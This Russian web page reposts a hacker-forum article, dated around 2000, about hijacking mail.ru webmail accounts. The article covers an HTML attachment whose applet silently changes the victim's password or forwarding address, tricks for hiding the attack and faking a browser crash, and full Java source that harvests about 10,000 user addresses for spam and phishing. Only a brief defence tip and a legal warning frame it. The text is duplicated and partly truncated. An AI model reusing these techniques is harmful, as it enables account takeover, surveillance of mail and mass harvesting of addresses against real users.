Защита электронной почты
Чтобы защититься от угрозы, надо представлять себе, в чем она заключается. Статья, приведенная ниже, написана от имени человека, якобы взламывавшего чужие машины. На мой взгляд, для защиты от подобных взломов она подходит очень хорошо.
P.S. Тем, кто решит использовать материалы статьи для проникновения на чужую машину, рекомендую внимательно ознакомиться с разделом уголовного кодекса РФ, посвященным компьютерным преступлениям. Там лаконично все описано.
За ссылку благодарю участника Форума практиков конкурентной разведки Хоттабыча
Взлом почтового ящика с WWW- интерфейсом
На форуме hackzone.ru часто появляются запросы вида "Как сломать почтовый ящик на mail.xxx?" Чтобы помочь частично разгрузить форум, решено было написать данную статью. ;-). Она будет также полезна пользователям, решившим оценить свою почтовую систему.
В последнее время значительную популярность обрели почтовые системы на основе WWW-Интерфейса ( www.hotmail.com, www.mail.com, www.netscape.net в России - www.mail.ru). Web-почту "местного значения" также предлагают провайдеры, работающие по схемам "Интернет-Кард" или "Интернет-в-кредит". Честно говоря, автору совершенно непонятны причины такого успеха. Сторонники подобных систем обычно заявляют о простоте и удобстве пользования, при большей безопасности, ссылаясь на огромное кол-во вирусов и печальный пример MS Outlook и MS Outlook Express 5. Первые два аргумента, похоже, соответствуют действительности, а о безопасности поговорим чуть ниже.
В статье будет рассмотрен один из вариантов технического подхода к вскрытию почтового ящика, основанного на совместном использовании недоработок современных браузеров, принципиальных недостатках CGI, и ошибках в политике безопасности почтовых служб. Именно он чаще всего применяется в атаках на Web-почту. Для "конкретности", будет описан найденый автором метод "захвата" или "подслушивания" пользователя популярной в России системе mail.ru и способ защиты.
"Социальная инженерия" (сравнимый по эффективности) вид взлома рассматриваться не будет просто потому, что она детально рассмотрена в статьях других авторов hackzon'ы.
Существуют, конечно и другие методы, возможно, лучшие, чем описанный ниже. Может, их авторы тоже поделятся своими мыслями в отзывах или напишут статью...
1. Принципиальные недостатки безопасности WWW-почты.
(Не)Надежность обычной почтовой програмы определяется (без)грамотностью её написания.
Браузер же как система прочтения почты изначально недостаточно безопасен, поэтому создатели почты вынуждены налагать ограничения на теги, используемые в письмах (
Письмо можно сформировать просто присоединением (attach) HTML -файла (в Netscape Messenger, например) содержащего необходимые теги. Присоединенный в Messenger'е HTML-файл mail.ru откроет автоматически.
Как только абонент попытается прочитать письмо, выполнится апплет, и через несколько секунд форма будет отослана от имени жертвы.
Вот, в принципе, и всё. Пользователю присвоен новый пароль. Если мы хотим "просто подслушивать" пользователя, в значение полей Password необходимо внести 16 звёздочек, а в поле Forward - куда отсылать копии. Это довольно рискованный вариант: пользователь может случайно заглянуть в настройки и заметить адрес.
3. Макияж...
Не стоит, конечно, проводить всю эту процедуру перед глазами пользователя ( может он ещё не отключил подтверждение на отправку форм или успеет запомнить разглядеть и запомнить новый пароль). Разумнее переадресовать апплет на какой-нибудь файл содержащий frameset
где zastavka маскирует письмо под безобидную рекламу или дружеское письмо, а editprofile выполняется в невидимом фрейме.
По окончании смены паролей лучше сымитировать сбой т.к. в течении сеанса пользователь может исправить пароль. В IE под Win 95/98, например, достаточно выполнить скрипт open("javascript:open(window.location)"); приводящий к бесконечному размножению окон, требующему перезагрузки. Само письмо лучше отослать (на случай неудачи) от анонимной службы рассылки писем. ( Смотрите статью "Атака на отказ...").
На 06.01.2000 пример ещё работал. Исходники на www.chat.ru/~avkvladru/mail/
Защититься от этой атаки как всегда просто. Отключить Java, а лучше, отказаться от использования Web-интерфейсов. Тот же mail.ru предлагает и форвардинг и pop-сервера. Экономия на настройке приносит проблемы с безопасностью не только администраторам больших сетей, поверьте.
4. Составляем список абонентов сервера.
Заветной мечтой всех спамеров мира является список (база) абонентов. Недаром, в их среде постоянно ходят слухи о каких-то почтовых серверах, поддерживающих команду finger ;). Также пару дней назад на форуме видел очередной крик души ( если таковая ещё жива ;-) :
"Нужна база е-мейлов по заграничным и Московским сайтам $$$ - Вася 02:53:36 06/1/2000 (0)"
Нередко почтовые Web-сервера могут "бесплатно" предоставить подобную информацию. Метод её получения довольно прост. При легальной работе с почтовым ящиком запоминаем адреса CGI-скриптов, ответственных за смену и чтение параметров пользователей. Потом, вызываем их без параметров (форм). Вполне вероятны ошибки в скриптах, при которых они отработают с последними занесёнными ( или использующимися в текущий момент) именами пользователей.
Конечно, шансов на то, что параметры можно изменить нулевые, а вот сообщение об ошибке доступа вполне может содержать имя пользователя, как это происходит на mail.ru. При обращении к тому-же "http://koi.mail.ru/cgi-bin/modifyuser?modify" выдаётся сообщение вида
Настройки пользователя mnebojsa@mail.ru
Ошибка. Не заполнены необходимые поля.
-
При следующем обращении "сдастся" следующий пользователь или "@/" если таковых не окажется. Осталось исследовать внутреннюю структуру ответа, да написать программу, повторяющую подобные запросы и фильтрующую ответ в поисках нужной информации. Лучше запускать её в часы пик
-------------------------
http://www.chat.ru/~avkvladru/mail/getname.java
-------------------------
import java.io.*;
import java.net.*;
import java.util.*;
public class getname {
public static void main(String args[]) {
String nextline;
try
{
URL mailserv= new URL("http://koi.mail.ru/cgi-bin/modifyuser?modify");
for (int i=1;i<=10000;i++)
{
DataInputStream input = new DataInputStream (
mailserv.openConnection().getInputStream());
nextline=input.readLine();
nextline=input.readLine();
nextline=input.readLine(); // Нужный нам адрес - в третьей строке
// выходного документа
System.out.println( nextline);
input.close();
}
}
catch(Exception ioe)
{
System.out.println(ioe.toString());
}
}
};
--------------------------------------------------
Вызовы команд вида ( в среде JDK)
:javac getname.java - компилируем файл
:java getname > userlist.txt
занесут в файл userlist.txt примерно 10000 e-mail адресов.
Теперь больной манией величия "хаксор" вполне может создать программу, автоматически рассылающую письма-ловушки отбирающие почтовые ящики, практичный спаммер - рекламу, а конкуренты - сообщение, вида: "бесплатный сервис mail.ru будет с начала месяца прекращён, воспользуйтесь xxxx.ru" или всё вместе
C Уважением
A.V. Komlin
avkvladru@netscape.net
P.S. "Иллюстрация"
Рабочий пример по захвату ящика находится в почтовом боксе intst2 сервера www.mail.ru. Паролем является комбинация из шести единиц "111111" или двоек "222222": попробуйте обе.
В InBox ( Входящих) находятся два письма:
От Дата Размер Тема
1 AVK Jan 07 1K change pass to 111111
2 AVK Jan 07 1K change pass to 222222
Когда Вы открываете любое из писем, оно автоматически меняет пароль бокса на указанный в "Теме" (111111 или 222222 соответственно). Для наглядности пример приведён без макияжа( маскировки).
Пожалуйста, перед запуском, убедитесь что у Вас включены cookies (они необходимы для корректной работы почтового сервера) и работает JVM(Java).
PLS, не меняйте и не портьте почтовый ящик. Если пример не работает - скорее всего персонал mail.ru, получив извещение, устранил ошибку. Сообщите об этом мне или на hackzone.
А. V. Komlin
Источник
Статья “Google без секретов” (как искать в Гугле)
Статья «Кадровая дилемма в конкурентной разведке:
«Маркетологи» или «Безопасники»
На главную страницу сайта
Ющук Евгений Леонидович. “Конкурентная разведка”
Ющук Евгений Леонидович. “Невидимый Интернет”
Открытый мастер-класс Ющук Евгения Леонидовича по противодействию информационному нападению в Интернете
Пример разработки объекта по открытым источникам методами конкурентной разведки в информационной войне и доведения своей точки зрения до общественности
Пример создания “сайта-аккумулятора” для целей противодействия черному пиару в информационной войне
P.S. Тем, кто решит использовать материалы статьи для проникновения на чужую машину, рекомендую внимательно ознакомиться с разделом уголовного кодекса РФ, посвященным компьютерным преступлениям. Там лаконично все описано.
За ссылку благодарю участника Форума практиков конкурентной разведки Хоттабыча
Взлом почтового ящика с WWW- интерфейсом
На форуме hackzone.ru часто появляются запросы вида "Как сломать почтовый ящик на mail.xxx?" Чтобы помочь частично разгрузить форум, решено было написать данную статью. ;-). Она будет также полезна пользователям, решившим оценить свою почтовую систему.
В последнее время значительную популярность обрели почтовые системы на основе WWW-Интерфейса ( www.hotmail.com, www.mail.com, www.netscape.net в России - www.mail.ru). Web-почту "местного значения" также предлагают провайдеры, работающие по схемам "Интернет-Кард" или "Интернет-в-кредит". Честно говоря, автору совершенно непонятны причины такого успеха. Сторонники подобных систем обычно заявляют о простоте и удобстве пользования, при большей безопасности, ссылаясь на огромное кол-во вирусов и печальный пример MS Outlook и MS Outlook Express 5. Первые два аргумента, похоже, соответствуют действительности, а о безопасности поговорим чуть ниже.
В статье будет рассмотрен один из вариантов технического подхода к вскрытию почтового ящика, основанного на совместном использовании недоработок современных браузеров, принципиальных недостатках CGI, и ошибках в политике безопасности почтовых служб. Именно он чаще всего применяется в атаках на Web-почту. Для "конкретности", будет описан найденый автором метод "захвата" или "подслушивания" пользователя популярной в России системе mail.ru и способ защиты.
"Социальная инженерия" (сравнимый по эффективности) вид взлома рассматриваться не будет просто потому, что она детально рассмотрена в статьях других авторов hackzon'ы.
Существуют, конечно и другие методы, возможно, лучшие, чем описанный ниже. Может, их авторы тоже поделятся своими мыслями в отзывах или напишут статью...
1. Принципиальные недостатки безопасности WWW-почты.
(Не)Надежность обычной почтовой програмы определяется (без)грамотностью её написания.
Браузер же как система прочтения почты изначально недостаточно безопасен, поэтому создатели почты вынуждены налагать ограничения на теги, используемые в письмах (
Письмо можно сформировать просто присоединением (attach) HTML -файла (в Netscape Messenger, например) содержащего необходимые теги. Присоединенный в Messenger'е HTML-файл mail.ru откроет автоматически.
Как только абонент попытается прочитать письмо, выполнится апплет, и через несколько секунд форма будет отослана от имени жертвы.
Вот, в принципе, и всё. Пользователю присвоен новый пароль. Если мы хотим "просто подслушивать" пользователя, в значение полей Password необходимо внести 16 звёздочек, а в поле Forward - куда отсылать копии. Это довольно рискованный вариант: пользователь может случайно заглянуть в настройки и заметить адрес.
3. Макияж...
Не стоит, конечно, проводить всю эту процедуру перед глазами пользователя ( может он ещё не отключил подтверждение на отправку форм или успеет запомнить разглядеть и запомнить новый пароль). Разумнее переадресовать апплет на какой-нибудь файл содержащий frameset
где zastavka маскирует письмо под безобидную рекламу или дружеское письмо, а editprofile выполняется в невидимом фрейме.
По окончании смены паролей лучше сымитировать сбой т.к. в течении сеанса пользователь может исправить пароль. В IE под Win 95/98, например, достаточно выполнить скрипт open("javascript:open(window.location)"); приводящий к бесконечному размножению окон, требующему перезагрузки. Само письмо лучше отослать (на случай неудачи) от анонимной службы рассылки писем. ( Смотрите статью "Атака на отказ...").
На 06.01.2000 пример ещё работал. Исходники на www.chat.ru/~avkvladru/mail/
Защититься от этой атаки как всегда просто. Отключить Java, а лучше, отказаться от использования Web-интерфейсов. Тот же mail.ru предлагает и форвардинг и pop-сервера. Экономия на настройке приносит проблемы с безопасностью не только администраторам больших сетей, поверьте.
4. Составляем список абонентов сервера.
Заветной мечтой всех спамеров мира является список (база) абонентов. Недаром, в их среде постоянно ходят слухи о каких-то почтовых серверах, поддерживающих команду finger ;). Также пару дней назад на форуме видел очередной крик души ( если таковая ещё жива ;-) :
"Нужна база е-мейлов по заграничным и Московским сайтам $$$ - Вася 02:53:36 06/1/2000 (0)"
Нередко почтовые Web-сервера могут "бесплатно" предоставить подобную информацию. Метод её получения довольно прост. При легальной работе с почтовым ящиком запоминаем адреса CGI-скриптов, ответственных за смену и чтение параметров пользователей. Потом, вызываем их без параметров (форм). Вполне вероятны ошибки в скриптах, при которых они отработают с последними занесёнными ( или использующимися в текущий момент) именами пользователей.
Конечно, шансов на то, что параметры можно изменить нулевые, а вот сообщение об ошибке доступа вполне может содержать имя пользователя, как это происходит на mail.ru. При обращении к тому-же "http://koi.mail.ru/cgi-bin/modifyuser?modify" выдаётся сообщение вида
Настройки пользователя mnebojsa@mail.ru
Ошибка. Не заполнены необходимые поля.
-
При следующем обращении "сдастся" следующий пользователь или "@/" если таковых не окажется. Осталось исследовать внутреннюю структуру ответа, да написать программу, повторяющую подобные запросы и фильтрующую ответ в поисках нужной информации. Лучше запускать её в часы пик
-------------------------
http://www.chat.ru/~avkvladru/mail/getname.java
-------------------------
import java.io.*;
import java.net.*;
import java.util.*;
public class getname {
public static void main(String args[]) {
String nextline;
try
{
URL mailserv= new URL("http://koi.mail.ru/cgi-bin/modifyuser?modify");
for (int i=1;i<=10000;i++)
{
DataInputStream input = new DataInputStream (
mailserv.openConnection().getInputStream());
nextline=input.readLine();
nextline=input.readLine();
nextline=input.readLine(); // Нужный нам адрес - в третьей строке
// выходного документа
System.out.println( nextline);
input.close();
}
}
catch(Exception ioe)
{
System.out.println(ioe.toString());
}
}
};
--------------------------------------------------
Вызовы команд вида ( в среде JDK)
:javac getname.java - компилируем файл
:java getname > userlist.txt
занесут в файл userlist.txt примерно 10000 e-mail адресов.
Теперь больной манией величия "хаксор" вполне может создать программу, автоматически рассылающую письма-ловушки отбирающие почтовые ящики, практичный спаммер - рекламу, а конкуренты - сообщение, вида: "бесплатный сервис mail.ru будет с начала месяца прекращён, воспользуйтесь xxxx.ru" или всё вместе
C Уважением
A.V. Komlin
avkvladru@netscape.net
P.S. "Иллюстрация"
Рабочий пример по захвату ящика находится в почтовом боксе intst2 сервера www.mail.ru. Паролем является комбинация из шести единиц "111111" или двоек "222222": попробуйте обе.
В InBox ( Входящих) находятся два письма:
От Дата Размер Тема
1 AVK Jan 07 1K change pass to 111111
2 AVK Jan 07 1K change pass to 222222
Когда Вы открываете любое из писем, оно автоматически меняет пароль бокса на указанный в "Теме" (111111 или 222222 соответственно). Для наглядности пример приведён без макияжа( маскировки).
Пожалуйста, перед запуском, убедитесь что у Вас включены cookies (они необходимы для корректной работы почтового сервера) и работает JVM(Java).
PLS, не меняйте и не портьте почтовый ящик. Если пример не работает - скорее всего персонал mail.ru, получив извещение, устранил ошибку. Сообщите об этом мне или на hackzone.
А. V. Komlin
Источник
Статья “Google без секретов” (как искать в Гугле)
Статья «Кадровая дилемма в конкурентной разведке:
«Маркетологи» или «Безопасники»
На главную страницу сайта
Ющук Евгений Леонидович. “Конкурентная разведка”
Ющук Евгений Леонидович. “Невидимый Интернет”
Открытый мастер-класс Ющук Евгения Леонидовича по противодействию информационному нападению в Интернете
Пример разработки объекта по открытым источникам методами конкурентной разведки в информационной войне и доведения своей точки зрения до общественности
Пример создания “сайта-аккумулятора” для целей противодействия черному пиару в информационной войне